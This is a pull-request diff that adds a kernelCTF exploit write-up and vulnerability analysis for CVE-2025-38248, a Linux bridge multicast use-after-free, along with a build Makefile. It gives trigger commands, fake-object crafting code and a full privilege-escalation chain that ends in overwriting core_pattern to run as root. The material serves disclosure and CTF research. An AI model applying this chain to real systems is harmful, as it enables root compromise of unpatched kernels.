Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
127 changes: 127 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-38248_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,127 @@
# CVE-2025-38248

## Exploit Primitives

- **Vulnerable object**: `net_bridge_port` (`kmalloc-1k`)
- **Primitive chain**: UAF → controlled `hlist` write → `msg_msg->security` corruption → misaligned `kfree` → USMA privilege escalation

## Vulnerability Overview

The root cause is that `br_multicast_port_ctx_deinit()` ([br_multicast.c:2014](../linux/net/bridge/br_multicast.c)) only cancels multicast router timers but does not remove the port from the global multicast router port lists (`ip4_mc_router_list` / `ip6_mc_router_list`):

```c
void br_multicast_port_ctx_deinit(struct net_bridge_mcast_port *pmctx)
{
#if IS_ENABLED(CONFIG_IPV6)
del_timer_sync(&pmctx->ip6_mc_router_timer);
#endif
del_timer_sync(&pmctx->ip4_mc_router_timer);
// Missing: br_ip4_multicast_rport_del(pmctx)
// Missing: br_ip6_multicast_rport_del(pmctx)
}
```

This function is called during port deletion by `br_multicast_del_port()` ([br_multicast.c:2043](../linux/net/bridge/br_multicast.c)). Since it only cancels timers without cleaning up the `hlist` entries, deleting a port that is in permanent multicast router state (`mcast_router=2`) leaves a dangling pointer in the global router list.

Trigger sequence (corresponding to [exploit.c:829-849](../exploit/cos-121-18867.294.25/exploit.c)):

```bash
# 1. Create a bridge with VLAN filtering and multicast snooping
ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1
# 2. Add a port
ip link add name dummy1 up master br1 type dummy
# 3. Set as permanent multicast router → ip4_rlist / ip6_rlist added to global router list
ip link set dev dummy1 type bridge_slave mcast_router 2
# 4. Enable per-VLAN multicast snooping → disables base port context, ip4_rlist / ip6_rlist removed from list
ip link set dev br1 type bridge mcast_vlan_snooping 1
# 5. Reset then re-set mcast_router
# Note: setting directly to 2 would be skipped due to the (pmctx->multicast_router == val)
# check in br_multicast_set_port_router(), so we must first set to 0 to change the value,
# then set to 2 to trigger re-addition
ip link set dev dummy1 type bridge_slave mcast_router 0
ip link set dev dummy1 type bridge_slave mcast_router 2
# 6. Delete port → br_multicast_port_ctx_deinit() only cancels timers, doesn't clean up list → UAF
ip link del dev dummy1
```

## Exploitation

### 1. Leak and Heap Layout

Bypass KASLR using the [Entrybleed](https://www.willsroot.io/2022/12/entrybleed.html) prefetch side-channel ([exploit.c:299-455](../exploit/cos-121-18867.294.25/exploit.c)) to leak the kernel base (`leak_kernel_base`) and the direct mapping base (`leak_kheap_base`).

Then spray `msg_msg` objects (`kmalloc-cg-4k`) across 12 child processes (each with its own IPC namespace), totaling ~1.37 GB. Using the leaked heap base plus an empirical offset `0xa000000`, compute a target address `GUESSED_MSG_ADDR` that is highly likely to contain a `msg_msg` object. The subsequent write target is the `msg_msg->security` field (offset 40) at this address.

### 2. Trigger UAF and Reclaim

The bridge maintains a global multicast router port list (`ip4_mc_router_list`) to ensure multicast packets are forwarded to ports behind multicast routers. Each port is linked into this list via `net_bridge_mcast_port.ip4_rlist` (an `hlist_node`).

After deleting `dummy1`, its `net_bridge_port` (`kmalloc-1k`) is freed, but the global router list still references its `multicast_ctx.ip4_rlist` and `multicast_ctx.ip6_rlist`.

Spray a crafted `net_bridge_port` object via netlink (`NETLINK_USERSOCK`) `sk_buff` to reclaim the freed memory ([exploit.c:852-856](../exploit/cos-121-18867.294.25/exploit.c)):

```c
void craft_fake_net_bridge_port(void *fake, void* target_1, void* target_2) {
struct net_bridge_port *p = (struct net_bridge_port *)fake;
p->multicast_ctx.ip4_rlist.next = target_1 - 8; // write target 1
p->multicast_ctx.ip6_rlist.next = target_2 - 8; // write target 2 (marker)
p->multicast_ctx.port = 0xffffffffffffffff; // pass null checks
}
```

The two write targets are:
- `target_1` = `&GUESSED_MSG_ADDR->security` (to overwrite `msg_msg->security`)
- `target_2` = `&GUESSED_MSG_ADDR->mtext[MARKER_OFFSET]` (to write a marker in the message data for victim identification)

### 3. Controlled Write

Create `dummy2` and set `mcast_router=2` ([exploit.c:858-864](../exploit/cos-121-18867.294.25/exploit.c)), triggering `br_multicast_add_router()` ([br_multicast.c:3339](../linux/net/bridge/br_multicast.c)) to traverse the router list. When it encounters the dangling node (now occupied by our crafted data), the kernel calls `hlist_add_behind_rcu()` to insert `dummy2`'s node after it:

```c
// include/linux/rculist.h:678
static inline void hlist_add_behind_rcu(struct hlist_node *n,
struct hlist_node *prev)
{
n->next = prev->next; // [1]
WRITE_ONCE(n->pprev, &prev->next);
rcu_assign_pointer(hlist_next_rcu(prev), n);
if (n->next)
WRITE_ONCE(n->next->pprev, &n->next); // [2]
}
```

Here `prev` is the crafted node (occupying `dummy1`'s freed `ip4_rlist`), and `n` is `dummy2`'s `ip4_rlist`:

- `[1]`: We set `prev->next` to `&msg_msg->security - 8`, so `n->next = &msg_msg->security - 8`
- `[2]`: The address of `n->next->pprev` is `(&msg_msg->security - 8) + offsetof(hlist_node, pprev)` = `&msg_msg->security - 8 + 8` = `&msg_msg->security`. Thus `msg_msg->security` is overwritten with `&n->next`.

**Result**: `msg_msg->security = &dummy2->multicast_ctx.ip4_rlist.next`, i.e., `dummy2_base + 408`.

Similarly, the `ip6_rlist` write uses the same mechanism to write a non-zero value at `msg_msg->mtext[MARKER_OFFSET]`, serving as a marker to identify the victim.

### 4. Locate Victim msg_msg

Child processes use the `MSG_COPY` flag to non-destructively read all messages, checking whether offset `MARKER_OFFSET` (0x100) contains a non-zero value ([exploit.c:543-559](../exploit/cos-121-18867.294.25/exploit.c)). The marker written by the `ip6_rlist` write pinpoints exactly which `msg_msg` was hit:

```c
uint64_t *marker = &msgbuf.mtext[MARKER_OFFSET];
if (*marker) {
shared->victim_msg_idx = msg_idx;
shared->victim_process = process_idx;
}
```

### 5. Misaligned kfree and USMA Privilege Escalation

After deleting `dummy2`, reclaim its freed memory with `pg_vec` (`AF_PACKET` socket RX ring page pointer arrays, `kmalloc-1k`) ([exploit.c:872-877](../exploit/cos-121-18867.294.25/exploit.c)).

Then call `msgrcv` to receive the victim message. The kernel calls `kfree(msg->security)` when freeing the `msg_msg`:

- `msg->security` has been overwritten to `dummy2_base + 408` — this is not an object-aligned address, but a pointer at offset 408 within a `kmalloc-1k` object
- `kfree` does not validate whether the pointer is aligned to an object start; it places `dummy2_base + 408` directly onto the `kmalloc-1k` freelist
- Meanwhile, the `pg_vec` at `dummy2_base` is still actively referenced by a `packet_socket`

This is the core of the **misaligned kfree** technique: the next `kmalloc-1k` allocation returns `dummy2_base + 408`, so the newly allocated buffer starts from the middle of the live `pg_vec`. By spraying 616 bytes (= 1024 - 408, exactly covering the remainder of the object) of `core_pattern` page addresses via `sk_buff`, the latter half of the `pg_vec` entries (roughly from index 51 onward) are overwritten.

Finally, iterate over all `packet_socket`s and `mmap` their ring buffers ([exploit.c:646-667](../exploit/cos-121-18867.294.25/exploit.c)). The corrupted `pg_vec` entries cause the corresponding pages in the `mmap` region to map to the kernel page containing `core_pattern`. Overwrite `core_pattern` with `|/proc/%P/fd/666 %P`. A previously forked child process ([exploit.c:778-783](../exploit/cos-121-18867.294.25/exploit.c)) detects the overwrite and triggers a crash, causing the kernel to execute the exploit binary itself with root privileges to read the flag.

124 changes: 124 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-38248_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,124 @@
# Vulnerability Details

- **Requirements**:
- **Capabilities**: `CAP_NET_ADMIN`
- **Kernel configuration**: `CONFIG_BRIDGE_IGMP_SNOOPING`
- **User namespaces required**: Yes
- **Introduced by**:
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4b30ae9adb04 ("net: bridge: mcast: re-implement br_multicast_{enable, disable}_port functions")
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2796d846d74a ("net: bridge: vlan: convert mcast router global option to per-vlan entry")
- **Fixed by**: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f05a4f9e959e0fc098046044c650acf897ea52d2
- **Affected Versions**: `5.15 - 6.15.5`
- **Affected Component**: `net/bridge` (multicast snooping)
- **Cause**: Use-after-free
- **Description**: When per-VLAN multicast snooping is toggled, `br_multicast_port_ctx_deinit()` only cancels multicast router timers but does not remove the port from the global (or per-VLAN) multicast router port lists. A port in permanent multicast router state (`mcast_router=2`) can be re-added to the router list after snooping mode changes, and when the port is subsequently deleted, a dangling pointer remains in the list. Traversing the list (e.g., when adding a new port) triggers a use-after-free on the freed `net_bridge_port` object.

# Vulnerability Analysis

The bridge maintains a global list of ports behind which a multicast
router resides. The list is consulted during forwarding to ensure
multicast packets are forwarded to these ports even if the ports are not
member in the matching MDB entry.

When per-VLAN multicast snooping is enabled, the per-port multicast
context is disabled on each port and the port is removed from the global
router port list:

```bash
# ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1
# ip link add name dummy1 up master br1 type dummy
# ip link set dev dummy1 type bridge_slave mcast_router 2
$ bridge -d mdb show | grep router
router ports on br1: dummy1
# ip link set dev br1 type bridge mcast_vlan_snooping 1
$ bridge -d mdb show | grep router
```

However, the port can be re-added to the global list even when per-VLAN
multicast snooping is enabled:

```bash
# ip link set dev dummy1 type bridge_slave mcast_router 0
# ip link set dev dummy1 type bridge_slave mcast_router 2
$ bridge -d mdb show | grep router
router ports on br1: dummy1
```

Since commit 4b30ae9adb04 ("net: bridge: mcast: re-implement
br_multicast_{enable, disable}_port functions"), when per-VLAN multicast
snooping is enabled, multicast disablement on a port will disable the
per-{port, VLAN} multicast contexts and not the per-port one. As a
result, a port will remain in the global router port list even after it
is deleted. This will lead to a use-after-free [1] when the list is
traversed (when adding a new port to the list, for example):

```bash
# ip link del dev dummy1
# ip link add name dummy2 up master br1 type dummy
# ip link set dev dummy2 type bridge_slave mcast_router 2
```

Similarly, stale entries can also be found in the per-VLAN router port
list. When per-VLAN multicast snooping is disabled, the per-{port, VLAN}
contexts are disabled on each port and the port is removed from the
per-VLAN router port list:

```bash
# ip link add name br1 up type bridge vlan_filtering 1 mcast_snooping 1 mcast_vlan_snooping 1
# ip link add name dummy1 up master br1 type dummy
# bridge vlan add vid 2 dev dummy1
# bridge vlan global set vid 2 dev br1 mcast_snooping 1
# bridge vlan set vid 2 dev dummy1 mcast_router 2
$ bridge vlan global show dev br1 vid 2 | grep router
router ports: dummy1
# ip link set dev br1 type bridge mcast_vlan_snooping 0
$ bridge vlan global show dev br1 vid 2 | grep router
```

However, the port can be re-added to the per-VLAN list even when
per-VLAN multicast snooping is disabled:

```bash
# bridge vlan set vid 2 dev dummy1 mcast_router 0
# bridge vlan set vid 2 dev dummy1 mcast_router 2
$ bridge vlan global show dev br1 vid 2 | grep router
router ports: dummy1
```

When the VLAN is deleted from the port, the per-{port, VLAN} multicast
context will not be disabled since multicast snooping is not enabled
on the VLAN. As a result, the port will remain in the per-VLAN router
port list even after it is no longer member in the VLAN. This will lead
to a use-after-free [2] when the list is traversed (when adding a new
port to the list, for example):

```bash
# ip link add name dummy2 up master br1 type dummy
# bridge vlan add vid 2 dev dummy2
# bridge vlan del vid 2 dev dummy1
# bridge vlan set vid 2 dev dummy2 mcast_router 2
```

The root cause is that `br_multicast_port_ctx_deinit()` only cancels
multicast router timers but does not remove the port from the router
port lists:

```c
void br_multicast_port_ctx_deinit(struct net_bridge_mcast_port *pmctx)
{
#if IS_ENABLED(CONFIG_IPV6)
del_timer_sync(&pmctx->ip6_mc_router_timer);
#endif
del_timer_sync(&pmctx->ip4_mc_router_timer);
// Missing: br_ip4_multicast_rport_del(pmctx)
// Missing: br_ip6_multicast_rport_del(pmctx)
}
```

The fix adds the missing list removal calls so that ports are properly
unlinked from the router port lists during port/VLAN deletion.

Note that deleting the multicast router timer is not enough as it only
takes care of the temporary multicast router states (1 or 3) and not the
permanent one (2).

Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
KERNELXDK_INCLUDE_DIR ?= /usr/local/include
KERNELXDK_LIB_DIR ?= /usr/lib

CXX = g++
CXXFLAGS = -I. -I$(KERNELXDK_INCLUDE_DIR) -static -pthread -s
LDFLAGS = -L$(KERNELXDK_LIB_DIR) -lkernelXDK -lkeyutils

exploit: exploit.cpp target_db.kxdb
$(CXX) $(CXXFLAGS) -o $@ $< $(LDFLAGS)

exploit_debug: exploit.cpp target_db.kxdb
$(CXX) $(CXXFLAGS) -g -o $@ $< $(LDFLAGS)

target_db.kxdb:
wget -O target_db.kxdb https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb

clean:
rm -f exploit exploit_debug target_db.kxdb

.PHONY: clean
Binary file not shown.
Loading